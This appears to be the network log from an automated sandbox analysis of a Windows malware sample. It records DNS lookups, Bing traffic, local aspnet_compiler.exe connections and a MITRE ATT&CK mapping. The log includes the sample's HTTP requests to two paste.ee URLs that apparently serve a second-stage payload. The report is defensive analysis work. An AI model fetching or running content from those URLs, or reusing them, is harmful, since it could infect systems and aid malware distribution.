
0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR
DNS

28.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.179.17.96.in-addr.arpa

IN PTR

Response

28.179.17.96.in-addr.arpa

IN PTR

a96-17-179-28deploystaticakamaitechnologiescom
DNS

28.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.179.17.96.in-addr.arpa

IN PTR
DNS

132.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.178.17.96.in-addr.arpa

IN PTR

Response

132.178.17.96.in-addr.arpa

IN PTR

a96-17-178-132deploystaticakamaitechnologiescom
DNS

132.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.178.17.96.in-addr.arpa

IN PTR
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response

172.67.187.200:443

https://paste.ee/r/qpFrB

tls, http

49bf33f0b08d37da284f8639c1f00055.exe

2.8kB
26.0kB
35
30

HTTP Request

GET https://paste.ee/r/esh7c

HTTP Response

200

HTTP Request

GET https://paste.ee/r/qpFrB

HTTP Response

200
204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

tls, http2

2.4kB
10.0kB
25
20

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

HTTP Response

204
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4

tls, http2

80.9kB
2.3MB
1652
1646

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301236_1F0R8LNJXXE73BCIY&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301362_1O9HVN7VX0LX9G6S2&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300929_14U14WCS4159DH3B0&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301645_1DQ842AA5KWZY6AM7&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
549 B
11
7
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.9kB
9.6kB
19
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.4kB
739 B
13
8
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.7kB
8.4kB
19
15
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe
127.0.0.1:442

aspnet_compiler.exe

8.8.8.8:53

paste.ee

dns

49bf33f0b08d37da284f8639c1f00055.exe

54 B
86 B
1
1

DNS Request

paste.ee

DNS Response

172.67.187.200

104.21.84.67
8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.187.67.172.in-addr.arpa

dns

219 B
135 B
3
1

DNS Request

200.187.67.172.in-addr.arpa

DNS Request

200.187.67.172.in-addr.arpa

DNS Request

200.187.67.172.in-addr.arpa
8.8.8.8:53

155.179.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

155.179.17.96.in-addr.arpa

DNS Request

155.179.17.96.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

6.181.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

6.181.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

140 B
156 B
2
1

DNS Request

9.228.82.20.in-addr.arpa

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

167.109.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

167.109.18.2.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

134.71.91.104.in-addr.arpa

dns

288 B
137 B
4
1

DNS Request

134.71.91.104.in-addr.arpa

DNS Request

134.71.91.104.in-addr.arpa

DNS Request

134.71.91.104.in-addr.arpa

DNS Request

134.71.91.104.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

160.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

160.178.17.96.in-addr.arpa
8.8.8.8:53

183.1.37.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

183.1.37.23.in-addr.arpa
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

119.110.54.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

119.110.54.20.in-addr.arpa
8.8.8.8:53

166.178.17.96.in-addr.arpa

dns

216 B
137 B
3
1

DNS Request

166.178.17.96.in-addr.arpa

DNS Request

166.178.17.96.in-addr.arpa

DNS Request

166.178.17.96.in-addr.arpa
8.8.8.8:53

171.179.17.96.in-addr.arpa

dns

216 B
137 B
3
1

DNS Request

171.179.17.96.in-addr.arpa

DNS Request

171.179.17.96.in-addr.arpa

DNS Request

171.179.17.96.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

146.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

146.178.17.96.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

140.71.91.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

140.71.91.104.in-addr.arpa
8.8.8.8:53

37.179.17.96.in-addr.arpa

dns

142 B
135 B
2
1

DNS Request

37.179.17.96.in-addr.arpa

DNS Request

37.179.17.96.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

213 B
157 B
3
1

DNS Request

198.187.3.20.in-addr.arpa

DNS Request

198.187.3.20.in-addr.arpa

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

0.205.248.87.in-addr.arpa

dns

213 B
116 B
3
1

DNS Request

0.205.248.87.in-addr.arpa

DNS Request

0.205.248.87.in-addr.arpa

DNS Request

0.205.248.87.in-addr.arpa
8.8.8.8:53

28.179.17.96.in-addr.arpa

dns

142 B
135 B
2
1

DNS Request

28.179.17.96.in-addr.arpa

DNS Request

28.179.17.96.in-addr.arpa
8.8.8.8:53

132.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

132.178.17.96.in-addr.arpa

DNS Request

132.178.17.96.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2568-16-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2568-19-0x0000000072D90000-0x0000000073341000-memory.dmp

Filesize
5.7MB

Download
memory/2568-20-0x0000000072D90000-0x0000000073341000-memory.dmp

Filesize
5.7MB

Download
memory/4656-12-0x0000000072D90000-0x0000000073341000-memory.dmp

Filesize
5.7MB

Download
memory/4656-13-0x0000000004350000-0x0000000004360000-memory.dmp

Filesize
64KB

Download
memory/4656-11-0x0000000072D90000-0x0000000073341000-memory.dmp

Filesize
5.7MB

Download
memory/4656-15-0x0000000004350000-0x0000000004360000-memory.dmp

Filesize
64KB

Download
memory/4656-18-0x0000000072D90000-0x0000000073341000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request